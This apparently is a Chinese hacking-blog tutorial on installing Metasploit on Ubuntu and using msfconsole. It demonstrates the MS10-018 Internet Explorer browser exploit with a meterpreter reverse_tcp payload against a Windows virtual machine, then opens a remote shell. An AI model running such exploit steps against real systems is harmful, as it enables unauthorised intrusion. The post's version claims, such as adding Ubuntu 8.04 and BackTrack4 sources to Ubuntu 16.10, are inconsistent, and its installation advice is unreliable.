危险漫步博客
新鲜的“黑客思维”就是从全新的角度看待黑客技术,从更高的层面去思考;专注于黑客精神及技术交流分享的独立博客。
文章2306 浏览20613881

Ubuntu下玩转Metasploit

Ubuntu从最初发展到现在的16.10版本各个方面已经做得很不错,比如界面可以说是很美观了,由于采用了“Ubuntu软件中心”进行软件管理,使得软件的安装比其他的Linux发行版本更方便,可以说一键安装。于是今天索性把Windows格了,直接把渗透平台换成了Ubuntu,让Windows在虚拟机中跑。而Metasploit则是一款安全测试开发框架,不仅提供了console模式,还提供了Gui模式,不过如果要用Gui模式这要先安装JDK,但是这在Ubuntu中却很简单,只要到“ubuntu软件中心”直接搜索“java”,选择其中的“OpenjDK Java 6 Runtime”安装就可以了。由于版面限制,Gui模式在本文中就不做具体介绍了。至于其中的一些参数设置跟下面介绍的console模式相类似。

在Ubuntu下安装Metasploit对于各位来说是比较麻烦的,Ubuntu安装可不像在Windows那样只要一个安装包一路确定就搞定了,就拿Metasploit来说,如果按照官方文档的说明,那可要安装不下10个的软件包,而且还不一定会一切顺利,可能出现各种各样的问题。但是BackTrack4的出现让一切变得简单了很多,众所周知BackTrack4是基于Ubuntu 8.04开发的,也就是说BackTrack4的软件源同样适用于Ubuntu 16.10。要是大家不小心的话,有可能把16.10版本更新成8.04版本。

添加Ubuntu 8.04软件源代码

添加成功后会有提示然后可以执行软件包的更新跟Metasploit的安装。

这其中会要求我们选择“Y”或者“N”,这当然毫不犹豫的选择“Y”了。然后framework3就会自动下载软件包,并解包安装。然后我们可以用“cd/opt/metasploit3/msf3”命令进入Metasploit目录,直接“sudo svn update”进行软件的更新,但是要注意的是,当你执行“svn update”的时候,要先执行“sudo apt-get install subversion”命令进行svn的安装。

接着执行“sudo ./msfconsole”运行Metasploit,如果一切顺利的话,可以看到成功的界面。

从中我们可以看到Metasploit的一些基本信息,如软件版本、更新日期、可用的exploits、payloads、auxiliairy数目等信息。为了让各位不会一看到shell就头大,下面我们看下Metasploit的一些基本命令。

1、“?”列出帮助菜单(如果记性不好的话,这命令一定是必需的)。

2、“show”列出所有可用的Encoders、NOPGenerators、Exploits、Auxiliary、PayloadS。

3、“msfcli”列出所以可用的Exploits、Auxiliary,但是对于指定的Exploit,我们可以用Ubuntu下的“grep”进行过滤,比如我们要找Windows公开的exploit,我们可以用“msfcli |grep msl0”进行查找。

4、“use”启用漏洞模块(下面我们以msl0 018漏洞进行讲解方便大家理解)那么我们可以用“usewin dows/brows er/ms10_018_ie_behaviors”命令进行设定。

5、“info”,漏洞信息查看,假如我们用“infowindows/browser/ms10_018_ie_behaviors”就可以查看msl_018漏洞的详细信息。(但是如果我们先前已经启用了相应漏洞模块,那么我们直接用“info”就可以了)。

6、“show targets”显示受影响的系统,软件版本。

7、“show options”显示一些相应的设置信息。

8、“show payloads”显示该漏洞可用payload,也就是该漏洞成功触发后的连接方式,如:cmdshell、vnc、meterpreter等。

9、“set name”相应参数的设置,如“setSRVHOST 192.168.124.1”就可以设置本地监听的IP。“set payload windows/meterpreter/reverse_tcp”则设定要使用的payload。但是对于我们这样的懒人来说,则可以用“setg name”进行全局设置,“unsetg name”则取消全局设置。当设置完,我们最好用“show options”进行复查。

10、“exploit”一切都准备好,不开始,还干嘛呢。

11、“jobs”由于Metasploit可同时进行多个漏洞测试,当前模块开始后,则用后台方式运行,利用“jobs”可查看在后台运行的Exploit,“kill Id”命令则结束在后台运行的Exploit。

在VM虚拟机中运行了个Windows  R2,我们直接在IE中打开,看下能不能成功触发漏洞。

从图中我们可以看出IE成功触发了漏洞,并调用了个“notepad.exe”进程。有人可能有疑问了,成功是成功了,那么我们怎么进行操作呢?不急慢慢听我道来。这就要用到我们下面要讲的另一个命令了。

12、sessions -i成功触发主机查看,  “sessions -iId”则对相应主机进行操作。

由于我们之前“payload”设置了“windows/meterpreter/reverse_tep”,所以我们可以看出当对主机连接时,就启用了meterpreter,可能大家对meterreter不太熟悉,但是各位对顶顶大名的MT肯定很熟悉吧?meterpreter跟顶顶大名的MT有点相似,也是cmdshell下强大的工具,可以对主机的进程、用户、IP、hash等信息进行查看,具体命令就不详细介绍了,要不又要写大半个版面,大家可以用“?”进行查看。但是如果不习惯meterreter的操作,用“shell”命令则会开启cmdshell,跟Windows下的cmd操作一样。

13、background退出meterpreter,以便对其它的主机进行操作,如果用“quit”则直接结束当前的session。

从上面的例子中大家可以看到Metasploit的一些基本命令跟一些参数的设置,是不是觉很简单?不过这只是Metasploit的冰山一角,或者说只是一些基本操作,Metasploit的强大在于其集信息收集,密码破解,漏洞测试等为一体。如果真要详细介绍。

啰啰嗦嗦写了一大堆,这主要还是让一些没接触过Ubuntu的朋友们看起来不会一头雾水。不过话说回来时间过得真快,新的一年已经来了,在新的一年里大家开开心心,技术一年胜过一年,也希望各位能更多的支持我的博客,支持黑客,支持安全技术。至于文中大家如有有什么疑问可以通过我的博客上的联系方式联系到我。